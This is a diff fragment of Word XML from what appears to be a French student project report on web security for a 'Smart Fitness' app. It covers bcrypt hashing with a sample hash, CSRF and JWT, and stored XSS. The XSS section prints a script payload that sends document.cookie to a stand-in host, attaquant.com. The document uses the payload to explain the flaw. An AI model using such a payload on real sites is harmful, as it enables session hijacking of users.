+        </w:rPr>
+        <w:t xml:space="preserve">Avec </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Bcrypt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> les mots de passe sont cryptés sur une soixantaine de caractères,  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>bcrypt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>}$2a$10$woFD.JoUP44f4iyS0YLywO5TLT4xabSvFZF9T4NEwhcGLmjGkKsOe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:ind w:firstLine="705"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Une seconde source de vulnérabilité concerne les applications web fonctionnant avec une authentification </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>stateless</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> notamment les applications SPA comme le projet Smart Fitness. Une authentification </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>stateless</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> signifie que les informations ayant permis à un utilisateur de s’authentifier ne sont pas conserver entre deux requêtes successives. Une des vulnérabilités des applications </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>stateless</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> est le CRSF (Cross-Site </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Request</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Forgery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="3C4858"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">« </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="3C4858"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">falsification de requête inter-sites </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="3C4858"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">»). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Le principe de cette faille consiste à envoyer un lien html à un utilisateur (par exemple dans un email) qui lorsque ce dernier cliquera dessus enverra par exemple une requête qui va supprimer la réservation d’une séance sur l’application Smart Fitness . Pour se prémunir ce genre d’attaque et sécuriser les échanges entre le client et le serveur, Spring Security utilise la bibliothèque JWT (JSON Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>). Le principe est l’échange d’un jeton signé permettant de vérifier la légitimité de la requête.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:ind w:firstLine="705"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Une troisième source de vulnérabilité sont les XSS. Le cross-site </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>scripting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> est une faille de sécurité que l'on peut trouver sur les sites web. Le principe est d'injecter du code côté client (JavaScript) dans une page qui sera vue et dont le code JS sera exécuté par d'autres utilisateurs. Par exemple si un site propose l’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>upload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> d’image avec la possibilité de remplir un champ de description et qu’un utilisateur malintentionné remplisse le champ description de la manière suivante :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Une image" /&gt;&lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>document.location</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>="http://attaquant.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>get.php?v</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=" + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>;&lt;/script&gt;&lt;p class="</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:ind w:firstLine="705"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La page sur le serveur contenant l’image </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>uplodé</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contiendra une description avec le code JS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:ind w:firstLine="705"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="000080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="000080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="008080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>src=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="DD1144"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>"./chat.jpg"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="008080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="008080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="DD1144"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>"Une image"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="000080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>/&gt;&lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="0086B3"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>.location</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="DD1144"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>"http://attaquant.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="DD1144"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>get.php?v</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="DD1144"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>="</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="0086B3"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="000080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;&lt;p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="008080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>class=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="DD1144"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="515151"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
